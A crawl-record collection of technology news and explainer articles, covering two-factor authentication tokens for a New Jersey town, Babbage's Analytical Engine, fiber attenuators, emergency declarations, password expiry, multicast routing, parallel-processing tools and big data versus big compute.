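insert(root, "dog", "dog")       # follows d -> o -> g, creating links as needed
print(contains(root, "dog"))     # True
print(contains(root, "do"))      # False: "do" is only a prefix here
```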
Huffman trees, the data structures behind Huffman data compression algorithms, are a popular use of tries. Huffman coding is discussed in the data compression section of this document.
As malicious hackers and identity thieves become more sophisticated, a password is no longer a foolproof way to control remote access to a government network. Increasingly IT managers turn to two-factor authentication to add a second electronic lock to the door that guards their organization's information systems.
The keys used to unlock authentication systems come in three varieties: something you know, such as a memorized password or personal identification number (PIN); something you have, perhaps a swipe card or an access badge; or who you are, established by a fingerprint or retinal scan, for example.
A two-factor authentication system requires a user to present two keys, chosen from two of the three categories, to get into a network. If you've ever inserted a debit card in an automated teller machine and then entered your PIN, you're familiar with the concept.
Two Are Better Than One
Two-factor authentication is becoming more popular in government.
"Post-9/11, there's a definite need to secure local government agencies," said Martin Naughton, IT director of Roselle, N.J.
In 2005, Roselle implemented the ProtectID authentication system from StrikeForce Technologies to protect confidential information on the network used by all municipal employees, including personnel who access applications from their desktops, and department heads and others who sometimes use a virtual private network (VPN) to log on remotely.
Before 2005, Roselle used Microsoft Windows Authentication, which required a user name and password to access the network. That didn't offer enough protection, Naughton said, because when an employee used the network to access the Internet, he or she sometimes encountered Web sites that installed spyware or other invasive code.
"People in the outside world would be able to access local passwords, possibly gain access to our network, and then go into the police department network," he explained.
To increase security, the IT department required users to change their passwords on a regular basis, but many refused, according to Naughton.
"If they did change it, they would forget what they changed it to over the weekend," he said. "That would require my time to reinitialize the password for them."
When Naughton researched two-factor authentication, he was especially interested in solutions that use tokens. A token is a "what you have" form of authentication that displays an identification code, and is usually small enough to fit on a key chain. Some tokens can be programmed to generate and display a series of pseudo-random numbers that change at regular intervals, for example, every 60 seconds.
To access the network, the token user enters the code currently displayed by the token at the given time. A token may also plug directly into a computer via the USB port, providing the current code automatically.
Naughton said he was drawn to the two-factor system because StrikeForce offered software-based tokens along with the hardware tokens with electronic displays -- something Roselle might consider in the future. Software-based tokens can run on desktop or notebook computers, BlackBerries, personal digital assistants or cell phones enabled with Java or BREW software.
With the network protected with two-factor authentication, a user is still required to enter a password to log on. He or she enters the current code from the token. Each token is registered on an authentication server, which runs the same algorithm as the token. The token and server are synchronized so that when the token code changes, the authentication server makes the same change.
"Every 60 seconds, the software that's running on the server also changes its six-digit number to correspond with the number on the key ring," said George Waller, executive vice president of StrikeForce.
In case a user misplaces or damages a token, Roselle has also chosen a backup authentication method from the company. When the user logs on, the display screen asks if he or she wants to use the token or a second method, based on a cell phone.
If the second method chosen is the cell phone, the user receives a call within a few seconds. The user then enters a memorized PIN on the telephone keypad. This is called "out-of-band" authentication, because the system receives the PIN over a telephone network rather than the Internet or local area network.
Using a PIN alone isn't considered very secure -- a hacker can steal it if it's written down, or may figure it out via social engineering -- however, the company's method adds an extra safety measure by relying on "what you have," Waller said.
The system places a call only to the phone that's registered with the server. So if a hacker were to break into a protected network with a stolen PIN, he would also have to steal the employee's cell phone.
If Roselle implements software-based tokens in the future to supplement the hardware devices, its network will gain yet a third layer of protection.
When an end-user downloads the token software, ProtectID takes a "hash" of that person's device and stores it on the authentication server. A hash, Waller explained, is a snapshot of the identification numbers -- such as serial numbers and IP addresses -- of several components within the device. The hash uniquely identifies that computer, PDA or cell phone.
"Think of it as a digital fingerprint," he said.
When someone uses the device to remotely log on to the system, the software compares the device with the hash to verify that it's a particular person's machine and no one else's. A nontrusted device cannot access the network.
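A device "hash" of this kind is easy to picture: combine several hardware identifiers and digest them. The sketch below is purely illustrative; the identifiers are made up, and a real product would gather them from the operating system:

```python
import hashlib

def device_fingerprint(component_ids):
    """Digest a sorted set of component identifiers into one stable value."""
    material = "|".join(sorted(component_ids))
    return hashlib.sha256(material.encode()).hexdigest()

print(device_fingerprint(["CPU-1234", "DISK-XYZ-987", "00:1A:2B:3C:4D:5E"]))
```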
Along with hardware and software tokens, and cell phone authentication, StrikeForce offers several other ways to control remote access to a network. They include fingerprint readers, iris scanners and smart cards, Waller said.
Because employees use the software to access the municipal network from their desks and remote computers, Naughton asked the company to customize the system to give him a sort of skeleton key to those machines.
"Say a user puts in a request for me to do some work on their computer, they're not in the office that day, and I decide I have time that day to do it," he explained. "For me to log on to that user account, I would need that token."
Now that Roselle employees must present two kinds of authentication, it's considered safe to keep using the same password, so it's no longer mandatory for users to change passwords every 30 days -- a big plus, Naughton said.
Tokens are generally advantageous as a second authentication key, said Naughton. For example, if a vendor's representative needed remote access to Roselle's network to provide upgrades or perform maintenance, Naughton would give the representative a temporary VPN password and read off the ID displayed on the token over the phone. This allows Naughton to monitor the network and give the vendor access only as needed.
"They're not coming [into the network] off-hours without my knowledge," he said, adding that along with those benefits comes the most essential one. "The knowledge that I'm operating a secure network now takes a lot off my mind." | <urn:uuid:27e117cc-4cb9-4244-96a7-89caa0143104> | CC-MAIN-2017-04 | http://www.govtech.com/magazines/gt/Halt-Who-Goes-There.html?page=2 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560283008.19/warc/CC-MAIN-20170116095123-00402-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.940351 | 1,472 | 2.71875 | 3 |
A campaign is underway to construct a never-before-built steam powered computer originally designed by the visionary engineer Charles Babbage.
The Analytical Engine was first conceived in 1837 and was to be constructed out of iron and brass. While Babbage fashioned parts of the revolutionary machine over the years, a complete, functioning Analytical Engine was never built.
A group hopes to change that by gathering private support from what it is hoped will eventually be 50,000 individuals to fund the build. Over 1,600 have already pledged a donation towards the cause.
The man behind the campaign, John Graham-Cumming, originally mooted the idea on plan28.org; more recently it has escalated to a project on PledgeBank and a Q&A session on Reddit to explain the idea.
“Babbage left behind extensive documentation of the Analytical Engine, the most complete of which can be seen in his Plan 28 (and 28a), which are preserved in a mahogany case that Babbage had constructed especially for the purpose,” writes Graham-Cumming in an article earlier this month.
“It might seem a folly to want to build a gigantic, relatively puny computer at great expense 170 years after its invention,” admits Graham-Cumming, but he pointed out that the true value of a completed Babbage Analytical Engine lies in the idea that it is possible to be 100 years ahead of your time.
“With support, this type of "blue skies" thinking can result in fantastic changes to the lives of everyone. Just think of the impact of the computer and ask yourself how different the Victorian world would have been with Babbage Engines at its disposal.”
Image credit: Catherine Helzerman | <urn:uuid:11cc3c02-f78a-4dd1-b6fd-7aa7650551c0> | CC-MAIN-2017-04 | http://www.pcr-online.biz/news/read/plan-to-build-babbage-steam-computer | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285337.76/warc/CC-MAIN-20170116095125-00310-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.960644 | 354 | 3.171875 | 3 |
So Why Do We Need a Fiber Optic Attenuator?
Bigger is much better, right? Or so many people believe. Beginners in fiber optic technology are often confused about why optical attenuators should reduce light intensity. Aren’t we using amplifiers to boost signal power? The fact is that too much light can overload a fiber optic receiver. Optical fiber attenuators are needed when a transmitter delivers too much light, such as when a transmitter is very close to the receiver.
So How Exactly Does a Fiber Attenuator Work?
Attenuators usually work by absorbing the light, as in a neutral-density thin-film filter, or by scattering the light, as in an air gap. They should not reflect the light, since that could cause unwanted back reflection in the fiber system. Another type of attenuator utilizes a length of high-loss optical fiber that operates on its input optical signal in such a way that the output signal power level is less than the input level. The power reduction is achieved by such means as absorption, reflection, diffusion, scattering, deflection, diffraction, and dispersion.
What’s the Most Important Feature a Fiber Attenuator Should Have?
The most crucial spec of an attenuator is its attenuation-versus-wavelength curve. Attenuators should have the same impact on all wavelengths used in the fiber system, or at least as flat a response as possible. For instance, a 3dB attenuator at 1500nm should also lessen the intensity of light at 1550nm by 3dB, or as close to that as possible; the same holds inside a WDM (Wavelength Division Multiplexing) system.
Different Types of Attenuators
There are two functional kinds of fiber attenuators: plug style (including bulkhead) and in-line. A plug-style attenuator is used like a male-female connector, where attenuation occurs inside the device, that is, on the light path from one ferrule to another. These include FC, LC, SC and ST fiber optic attenuators, among others. An in-line attenuator is connected to a transmission fiber by splicing its two pigtails.
The principles of operation of attenuators differ markedly because they use various phenomena to lower the power of the propagating light. The simplest means is to bend a fiber. Coil a fiber cable several times around a pencil while measuring the attenuation with a power meter, then tape the coil. You then have a primitive but working attenuator.
Most attenuators have fixed values that are specified in decibels (dB). These are called fixed fiber optic attenuators. For example, a -3dB attenuator should reduce the intensity of the output by 3dB. Manufacturers use various light-absorbing materials to achieve well-controlled and stable attenuation. For example, a fiber doped with a transition metal absorbs light in a predictable way and disperses the absorbed energy as heat.
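The arithmetic behind those dB figures follows the standard relation P_out = P_in * 10^(-dB/10). A quick sketch:

```python
def attenuate(power_in_mw, loss_db):
    """Apply a fixed attenuation in dB to an input power in milliwatts."""
    return power_in_mw * 10 ** (-loss_db / 10)

print(attenuate(1.0, 3))   # ~0.50 mW: a 3dB attenuator roughly halves the power
print(attenuate(1.0, 10))  # 0.10 mW: 10dB cuts the power to one tenth
```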
Variable optical attenuators are also available, but they are usually precision instruments used in making measurements. From FiberStore, you can get the best Variable Attenuators Instrument.
If it seems as if the whole country is in a "state of emergency," that's because most of it is. And that was before Hurricane Rita made landfall.
Fully 45 states, plus the District of Columbia, are now in a federally recognized state of emergency
as they take in the gulf coast residents displaced by Hurricane Katrina. President Bush also declared four of those states, where Katrina came ashore, "disaster" areas. By comparison, only Virginia and New York were declared federal disaster areas following the terrorist attacks in 2001.
This year, states are using various types of emergency and disaster declarations to deal with plenty of problems -- from hurricanes to drought to rampant crime.
For example, the governors of New Mexico and Arizona issued state emergency declarations in August because of widespread crime, damaged livestock and other problems in border communities beset with illegal immigrants and drug traffickers.
"The declaration ... helps free up red tape; it makes money easier to use," said Peter Olson, a spokesman for the New Mexico Department of Public Safety.
Both state and federal governments can declare emergencies or disasters. Generally speaking, the declarations give governments -- and their leaders -- powers they would not normally have.
A gubernatorial order, for example, usually allows a governor to mobilize the National Guard, suspend state laws, spend state money and order an evacuation. It means the state can step in to use its resources when local governments are overwhelmed.
The governor's declaration is also the first step in a process that allows states to recoup costs from the federal government for post-disaster cleanups or short-term evacuee housing.
The federal government can step in only when states ask for help. If a state is overwhelmed, though, federal aid can prove extremely valuable. The U.S. government, for example, has declared it will cover 100 percent of the cost of housing evacuees from Hurricane Katrina in states not hit by the storm.
Even without federal involvement, state declarations can help. New Mexico Gov. Bill Richardson (D) used a state declaration of emergency
last month to send more police to his state's four border counties. He instructed state workers to build a fence to protect livestock near the town of Columbus.
The move immediately freed up state money in a special emergency fund that Richardson used to staff a new field office of the New Mexico Department of Homeland Security.
But neither Richardson nor Arizona Gov. Janet Napolitano (D) have received federal assistance for the emergency. Richardson didn't ask for it. Napolitano recently asked the feds for more time to apply, because, she explained, Arizona's emergency management services have been focused on the Katrina refugees.
In any event, the declarations proved to be an effective political tool.
Bush pledged to beef up border security in response to the concerns of the two governors. The U.S. Border Patrol assigned 86 more agents to its Deming Station, the office that monitors New Mexico's international border. The Mexican state of Chihuahua also razed abandoned buildings in a border town that Richardson said were used as a staging ground for drug- and people-smuggling operations.
Without a request from a governor, the federal government cannot send disaster or emergency relief. The federal Stafford Act
requires that states activate their emergency response plan before asking the president for federal assistance.
The Stafford Act, first enacted in 1988, spells out the differences between a federal emergency and a federal disaster.
Disaster declarations are for catastrophic situations and, therefore, allow for greater federal help. They're used in situations such as tornadoes, landslides, floods and terrorist attacks. Before hurricane season, all of the federal states of emergency this year dealt with record or near-record snowfalls.
In both cases, the U.S. government picks up at least 75 percent of the cleanup costs.
The federal disaster declaration after Katrina for Alabama, Florida, Louisiana and Mississippi paves the way for long-term rebuilding efforts.
Federal emergencies, by contrast, are designed to address shorter-term problems.
For example, Gov. Mike Easley (D) of North Carolina, declared a state emergency on Sept. 10, a day before Hurricane Ophelia poured 12-15 inches of rain on the coastal areas. The declaration allowed National Guard troops to mobilize rescue teams, transportation workers to clear sand off roads and state troopers to provide additional security.
Later that week, Bush also declared a federal state of emergency in North Carolina, allowing federal resources to be used in the cleanup effort.
Shortly after the storm, federal and state emergency officials conducted a survey of the damage inflicted on North Carolina.
If the damage exceeds $9.2 million, the state would qualify for financial aid from the feds, too, said Patty McQuillan, a spokeswoman for the North Carolina Department of Crime Control and Public Safety. State officials pegged the amount of damage at nearly $34 million, according to The Associated Press.
Agricultural disasters are handled differently. A governor triggers the relief for counties in his state, but the federal government provides the relief directly to the affected farmers.
This year, Illinois Gov. Rod R. Blagojevich began the process that allowed farmers in 101 of the state's 102 counties to seek low-interest loans from the federal government because of drought conditions.
Following federal law, he asked county offices of the U.S. Department of Agriculture's Farm Service Agency to conduct damage assessment surveys of their areas. The report found that 93 counties qualified for the agriculture disaster designation; the remaining eight bordered counties that were primarily affected.
Blagojevich asked U.S. Agriculture Secretary Mike Johanns to declare an emergency in those 101 counties, which Johanns did.
To qualify for federal help, a farmer in one of the affected counties must lose at least 30 percent of his crop because of the disaster.
The "secretarial declaration" does not offer relief for state or local governments.
Reprinted from Stateline.org. | <urn:uuid:cc1bcf30-74f4-4ac7-a60c-3d53e2804e6e> | CC-MAIN-2017-04 | http://www.govtech.com/public-safety/Emergency-Declarations-Help-States-Cope.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280485.79/warc/CC-MAIN-20170116095120-00036-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.947336 | 1,224 | 2.96875 | 3 |
David Sancho, senior threat researcher with Trend Micro, has recently written a short but good post in which he pointed out the reasons why, despite their inherent insecurity, passwords are here to stay.
Among the advantages they offer are the fact that they can be used straight away, and that they are a good alternative to tying yourself to a specific authentication token, smartphone or location (and all the problems that might arise from that – lost devices, dead batteries, etc.).
He ended his post by giving advice to users on how to choose strong passwords, encouraged them to start using software for managing them, and finally, to use two-factor authentication where possible.
The adoption of the latter is not happening fast enough – whether because many services don’t offer the option, or users are simply not taking advantage of it where it exists – and instructions on how to create strong passwords often fall on deaf ears, so people like Lance James, head of Cyber Intelligence at Deloitte & Touche, are toying with some ideas that would force users to change their password-picking habits.
“One thing I’ve learned about humans is that in most cases, they will take the path of least resistance when it comes to change management, and only when applied pressure (road block is a nice way of putting it) or a reward is offered does this usually disrupt this path,” he recently noted in a blog post.
“We spend a lot of time telling the user to ‘do this because security experts advise it, or it’s part of our policy’ but we don’t really provide an incentive or an understanding of why we tell them to do this. Well humans are programmable, and the best way to see the human brain is to look at it like a Bayesian network. It requires training for it to adapt to change, and repeated consistent data to be provided.”
His proposed solution – described as “Pavlovian password management” – is to create a system that would allow users to choose weak passwords, but would penalize them by making them expire in a few days.
The stronger the chosen password, the longer the period between the initial and the next required moment of choice of a new password. In addition to seamlessly training users to choose better passwords, it would also teach them that no matter how strong a password is, it should be regularly changed.
“[The scheme] could scale password changes over time, since they won’t have to be done at the same time, also reducing predictability and making expiration/changes dependent upon the user,” James notes. “[It] could be also turned into a form of a game such as earning badges for ‘strongest password of the month’, or ‘top 10 security conscious users this week’.”
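James describes the idea rather than an implementation, but the core mechanic is easy to prototype. In the rough Python sketch below, the entropy estimate and the scaling constants are assumptions of mine, not part of his proposal:

```python
import math, string

def entropy_bits(password):
    """Crude charset-size * length estimate; real strength meters do more."""
    pools = [string.ascii_lowercase, string.ascii_uppercase,
             string.digits, string.punctuation]
    charset = sum(len(p) for p in pools if any(c in p for c in password))
    return len(password) * math.log2(charset) if charset else 0.0

def expiry_days(password, min_days=3, max_days=180):
    """Weak passwords expire within days; stronger ones earn months."""
    scale = min((entropy_bits(password) / 96) ** 2, 1.0)
    return max(min_days, int(max_days * scale))

print(expiry_days("hunter2"))                        # ~25 days
print(expiry_days("c0rrect-H0rse-battery_staple!"))  # capped at 180 days
```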
He makes some good points, and I, for one, would like to see this type of system implemented. Add to this the use of a password manager – one that hopefully has a password generator – and juggling passwords should not be a problem anymore.
Intel is also doing its part to teach users the importance of strong password choices and has recently announced World Password Day 2014, an initiative aimed at propagating good password practices among users. Help Net Security is a supporter of the initiative.
Also, if you are interested in additional tips and information about password alternatives, you can check out the interview we recently did with Per Thorsheim, the founder and main organizer of PasswordsCon, the first and only international conference on passwords. | <urn:uuid:b41a6b89-e8e9-4df4-90d7-7365418749a5> | CC-MAIN-2017-04 | https://www.helpnetsecurity.com/2014/05/06/password-management-done-right/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280825.87/warc/CC-MAIN-20170116095120-00522-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.959218 | 737 | 2.546875 | 3 |
Networking 101: Understanding Multicast Routing
Multicast has become a buzzword more than once in history. IP multicast means that one sender is sending data to multiple recipients, but only sending a single copy. It's very useful for streaming media, so let's explore how this works.
Much like broadcast, there are special addresses designated for multicast data. The difference is that some of these can be routed, and used on the Internet. The multicast space reserved by IANA is 224.0.0.0/4. We do not say, "Class D" anymore. The addresses spanned by 224/4 are 224.0.0.0 through 239.255.255.255.
Multicast is more efficient than broadcast, because broadcast packets have to be received by everyone on the local link. Each OS takes an interrupt, and passes the packet on for inspection, which normally involves some data copies. In multicast, the network card doesn't listen to these multicast packets unless it has been told to do so.
By default, with multicast-enabled network cards, the NIC will listen to only 224.0.0.1 at boot. This is the address assigned to "all systems on this subnet." Yes, that's very similar to broadcast. In fact, many people say that broadcast is a special case of multicast.
Multicast is selective in who it sends to, simply by nature of how network cards can ignore uninteresting things. This is how the local link works, but how about the Internet? If someone wants to stream the birth of a celebrity's baby in Africa via multicast, we don't want every router on the Internet to consume the bandwidth required to deliver it to each computer. Aside from the NIC being able to make decisions locally, there are multicast routing mechanisms that serve to "prune" certain subnets. If nobody wants to see it within your network, there's no reason to let it travel into the network.
People who are interested in seeing such a spectacle will run a special program, which in turn tells the NIC to join a multicast group. The NIC uses the Internet Group Management Protocol (IGMP) to alert local multicast routers that it'd like to join a specific group. This only works one-way, though. If someone wants to send and receive multicast, the IP layer will need to be fancier. For sending, IP will map an IP address to an Ethernet address, and tell the NIC driver so that it can configure the card with another MAC address.
IGMP itself is very simple. It's very similar to ICMP, because it uses the IP layer, only with a different protocol number. The header consists of only four things: a version; a type; a checksum; and the group, i.e. multicast address, to be joined. When that packet is sent, a multicast router now knows that at least one host is interested in receiving packets for a specific multicast address. Now that router must somehow do multicast routing with other routers to get the data.
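From an application's point of view, all of this is one socket option: the program asks to join a group, and the kernel sends the IGMP membership report on its behalf. A minimal Python sketch (the group address and port are arbitrary examples):

```python
import socket, struct

GROUP, PORT = "239.1.2.3", 5000  # example group in the 224/4 multicast space

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(("", PORT))

# Joining the group is what triggers the IGMP report to the local router.
mreq = struct.pack("4sl", socket.inet_aton(GROUP), socket.INADDR_ANY)
sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)

data, sender = sock.recvfrom(1500)  # blocks until traffic for the group arrives
```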
Here it gets interesting. There are a few multicast routing mechanisms that we'll talk about today: DVMRP and PIM. Pausing for just a moment, it's important to realize that even today multicast isn't widely supported. Back in the day there was a mbone, or multicast backbone, that people connected to via IPIP (IP encapsulated in IP) tunnels. The Unix application mrouted understood DVMRP and IGMP when the Internet routers did not. Most people who wish to use multicast nowadays still find themselves asking their ISPs why certain protocols aren't working.
DVMRP is the Distance Vector Multicast Routing Protocol. It is carried in IGMP messages (type 0x13), and does what's called Dense Flooding. Dense flooding is very effective, but very inefficient. A router will flood to everyone in the beginning, and then prune back uninterested subnets. PIM, or Protocol-Independent Multicast, is independent of unicast routing mechanisms. In dense mode operation, it is very much like DVMRP. PIM dense mode is essentially the same as DVMRP, except PIM uses IP protocol 103. PIM implements joins, prunes, and grafts. A graft is the opposite of a prune: it grafts a branch back onto the tree.
Dense mode multicast routing, regardless of protocol, works by sending data to everyone and then pruning back parts of the tree. A tree, as always, is used to represent a set of routers. When a bunch of branches get pruned, routers can eventually eliminate bigger and bigger chunks. If no branches are interested within an AS, the border router can send a prune message to the upstream router, hence it stops wasting bandwidth.
Sparse mode multicast routing utilizes a Rendezvous Point, or RP. All join messages are sent to the RP's unicast address, so this clearly requires a bit of prior knowledge. PIM sparse mode also operates a bit more intelligently. It uses shared trees, but if a router notices that it's closer to the source it can send a join upstream to ensure traffic starts flowing through the best point. The newly designated router then becomes the source distribution point for the network.
This is all fine and dandy, except for one little detail: the Internet isn't a vertical tree. Enterprises want to connect redundantly, so naturally giant loops will form. Reverse Path Forwarding (RPF) is used in multicast too, to make sure that loops don't happen. The basic idea is to verify that the interface a multicast packet arrives on is the shortest unicast path back to the sender. If not, then it probably didn't come from the sender, so the packet is dropped. If the RPF check is successful, the packet is duplicated and sent to everyone in the group.
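The RPF decision itself is a few lines of logic. A sketch (the function and parameter names are illustrative):

```python
def rpf_forward(source, arrival_iface, unicast_next_iface, member_ifaces):
    """Forward only if the packet arrived on the interface we would use to
    reach its source; otherwise assume a loop (or spoof) and drop it."""
    if arrival_iface != unicast_next_iface(source):
        return []  # RPF check failed: drop silently
    # RPF passed: duplicate out every interface with group members,
    # except the one the packet came in on.
    return [i for i in member_ifaces if i != arrival_iface]
```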
Quite a few other multicast routing protocols exist in the wild. OSPF has MOSPF, but that can really only be used within one domain. BGP has BGMP, but it's never been seen outside of captivity. Most are not really used, but people are always coming up with new and interesting ideas to make widespread use of multicast a reality. It's such a shame to watch the same video streamed separately from a Web site, when it would save tremendous bandwidth to use multicast and let the router duplicate when it needs to.
In a Nutshell
- Multicast uses special addresses to send data from a single sender to multiple recipients, even though the sender only sends one copy.
- Hosts or routers can join multicast groups via IGMP to tell other routers that they are interested.
- Dense protocols flood and prune, sparse modes will utilize an RP to avoid flooding unnecessarily. | <urn:uuid:9351a95a-191d-4bbf-82f5-27efa12f4c54> | CC-MAIN-2017-04 | http://www.enterprisenetworkingplanet.com/print/netsp/article.php/10953_3623181_2/Networking-101--Understanding-Multicast-Routing.htm | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280221.47/warc/CC-MAIN-20170116095120-00550-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.940431 | 1,419 | 3.890625 | 4 |
Opinion: Parallel-processing opportunities pose coding challenges, and diagnostic tools like Intel's VTune Performance Analyzer can help.
Dual-core processors are proliferating through PC product lines, including newly Windows-capable Macintosh systems. April has also seen the open-source release of Sun Microsystems' SPARC T1 processor design, with up to four threads running on each of up to eight cores.
Challenges that were once in the domain of supercomputing now present themselves to enterprise architects: Multithreaded cores, multicore processors and multiprocessor grids challenge software writers to rethink tasks for parallel processing.
Processor producers know that if they don't help software developers achieve nearly N-fold speedup from an N-core chip ("linear speedup," as it's called for short), then there won't be an attractive return on corporate investment in systems that use these complex processor designs.
Linear speedup is not achievable in most tasks: If an N-core processor merely fetches and concurrently performs successive blocks of instructions at a time, bad things happen, because it's common for the input to one instruction to be the output from the one before.
Any approach that performs more than one instruction during a single clock cycle must detect such sequential dependencies, and hold off on executing instructions whose input is not yet available.
In practice, it's more common to see power-law speedups with an exponent around 0.7, where two cores run a real task about 60 percent faster than one (2 to the power 0.7 is about 1.6) and four cores run only about 2.6 times as fast as one (4 to the 0.7). Some tasks, such as image processing, have exponents close to 1, while other tasks with strong sequential dependencies show exponents more like 0.3. At the latter degree of parallelization, 32 processors would run less than three times as fast as one.
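Those figures come straight from the power-law model, which is trivial to tabulate:

```python
def speedup(cores, exponent):
    """Empirical power-law model: N cores yield N**exponent the throughput."""
    return cores ** exponent

for n in (2, 4, 32):
    print(n, round(speedup(n, 0.7), 2), round(speedup(n, 0.3), 2))
# 2 cores at exponent 0.7: ~1.62x; 4 cores: ~2.64x; 32 cores at 0.3: only ~2.83x
```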
In a high-end chip maker's nightmare of such diminishing returns, buyers would have every reason to favor simple and mature designs built at razor-thin profit margins by any number of aggressive competitors.
Complex processors do have a payback proposition, paving a path toward more compact, less power-hungry and therefore less heat-generating server installations, but only if the speedup is there to pay for costly development and state-of-the-art fabrication.
It might seem as if inefficient code would lead to buyers needing more processors to perform a given task, and that this would be just fine with processor vendors, but this cynical reasoning overlooks the competitive environment just describedone in which vendors need to take the lead in wringing maximum ROI from their own technology.
It's also clear that cost-effective computing doesn't shrink technology demand. Rather, by pushing previously marginal applications over the threshold of being well worth doing, more cost-effectiveness makes IT vendors more money, not less.
It's therefore no surprise that a company like Intel produces not just chips but also sophisticated tools for optimizing the chips' performance. As far back as the debut of Intel's first Pentium processors in March 1993, when the chip's two concurrent pipelines posed real challenges to developers, I've found Intel's VTune Performance Analyzer a real eye-opener into what's actually happening inside a CPU.
The Windows version of VTune 8.0, released in February, includes full Vista and .Net support: "It can take you down to source code or assembly code, or go up to the thread level or the lock level and diagnose correctness errors with locks," said Intel Development Products Division Director James Reinders, when we talked about the product in March.
Albert Einstein famously said time is what keeps everything from happening all at once; his collaborator John Wheeler is less well-known for adding, "and space is what keeps everything from happening to me."
Software developers may well wish that they could seek refuge in Wheeler's space, because Einstein's time is no longer on their side: Making things happen all at once is now their job, with tools like VTune their best hope of getting it done.
Peter Coffee can be reached at email@example.com.
Check out eWEEK.com for the latest news, reviews and analysis in programming environments and developer tools.
Big data and big compute are not new concepts. Before the term “big data” took off as the buzzword du jour, the HPC community expressed these same ideas as compute-intensive and data-intensive computing. Problems were compute-bound or IO-bound or both.
It is the case, however, that the world is in the midst of a data explosion. In 2013, the amount of data flowing through the Internet was 667 exabytes, an amount equivalent to more than 141 billion DVDs. The quick rise of the big data conceptual framework reflects this paradigm. Big compute works nicely as a complementary term. They are essentially two sides of a coin, or are they?
In a recent TEDx Talk, Virginia Tech professor and noted HPC expert Wu Feng discusses how these elements are experienced differently across nations.
Feng begins his talk with a question: “In today’s rapidly evolving technological world, is our future in big data or big compute?”
As he provides an overview of the terms, Feng references HokieSpeed, the GPU-accelerated supercomputer that he developed, which debuted as the greenest commodity supercomputer in the US in November 2011. HokieSpeed is a big compute resource, notes Feng, capable of calculating 500 trillion operations per second*, 100,000 times faster than a typical PC.
HokieSpeed and other systems like it are being used for epidemiological studies, which can be used to guide public policy in the event of disease outbreaks. Simulations boost scientists’ understanding of how viruses spread, enabling them to assist public health officials in devising appropriate containment measures.
Another HokieSpeed project aims to reverse-engineer the brain. Researchers are trying to find repeating patterns of higher-order motor function in EEG brain readings. Simulations are used to map neurological pathways.
One of the neurological ailments in the news today is called CTE, a progressive, degenerative brain disease that is affecting athletes with a history of brain trauma, namely concussions. CTE can only be definitively diagnosed after death, but neurologists are working towards diagnosing and treating CTE in living patients. On a PC, this kind of research would take months or years instead of hours or days.
Big data has many definitions, and one important characteristic is that it’s relative, i.e., more data than you are used to. “Big data is your humongous haystack and various algorithms that you use to root around that haystack. Big compute is lots of metal detectors,” explains Feng. “They’re the devices with which you are going to try and find all the little needles of information in the haystack that you can glean some insight and knowledge from.”
Feng makes the case that different nations have different priorities when it comes to investing in big data or big compute.
Back in May 2013, Feng spoke with White House officials to discuss DNA sequencing research in the life sciences. One of the applications here includes finding mutations in genomes. This makes it possible to then infer different pathways that are causing cancer, setting the stage for potential treatments. At this function, there was clearly a focus on big data, notes Feng, while big compute, though important, was clearly secondary.
Three weeks later, Feng traveled to China as part of a US delegation, where he found that the converse was true.
“Here, we look at big data as being more important,” Feng states. “And in China, big compute is more important than big data, so much so that they created a supercomputer called TIANHE-2 that is 282 times faster than HokieSpeed and twice as fast as the fastest US supercomputer.”
They view big data merely as an application area of big compute, notes Feng.
Feng contends that big data, at least in the US, has been elevated to a position above big compute, in part because the compute side is so often hidden from the user. For example, Google returns search results with lightning speed, but the average person does not realize the immensity of the underlying computational infrastructure that has enabled this transaction.
He cites IBM Watson’s Jeopardy appearance as another example of a very visible “big data” application where the compute side was essentially hidden from the audience.
So what should we be investing in? asks Feng. As complementary forces, the data and compute go hand-in-hand. “In order to make sense of the data, we need to compute on the data.” There is a cycle in which data becomes information, then knowledge, then wisdom – and each of these steps requires computing.
*Note: According to Virginia Tech’s announcement, HokieSpeed claims “a single-precision peak of 455 teraflops, 455 trillion operations per second, and a double-precision peak of 240 teraflops, or 240 trillion operations per second.” | <urn:uuid:96221ed9-bfa9-4bd4-9904-6d3a1f0efaee> | CC-MAIN-2017-04 | https://www.hpcwire.com/2013/12/10/big-data-versus-big-compute/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280504.74/warc/CC-MAIN-20170116095120-00458-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.941352 | 1,027 | 3.34375 | 3 |
Researchers at Indiana University are working on knowledge graphs that use semantic relatedness between concepts to determine the likely truth of a statement.
Until voice recognition technology matures, smartphone users need ways to make text easier to input.
The company is building tools to visualize and analyze streaming location data from smartphones and sensors.
Researchers have found that they can detect people who are potential cybersecurity risks by reading their neural activity.
Stabilitas combines data, maps and local intelligence help organizations operate abroad with greater confidence by knowing the risks they face.
Smartphones can transmit an earthquake’s detected location and magnitude to the U.S. Geological Survey, which can then send alerts to others in the path of the shock waves.
With its market penetration and low power requirements, Bluetooth Smart is positioned to network the Internet of Things.
The AnyPen technology lets users write with a ballpoint pen or graphite pencil, delivering more precise navigation than a finger and eliminating the need for a proprietary stylus.
A researcher at Michigan State University has developed technology that can generate electrical power to buried or implanted sensors.
The technology built into most smartphones can provide more sophisticated authentication than a paper drivers’ license or passport. | <urn:uuid:513c17fd-15ae-412f-8751-c65016c10949> | CC-MAIN-2017-04 | https://gcn.com/blogs/emerging-tech/list/blog-list.aspx?Page=5 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282140.72/warc/CC-MAIN-20170116095122-00448-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.898075 | 245 | 2.671875 | 3 |
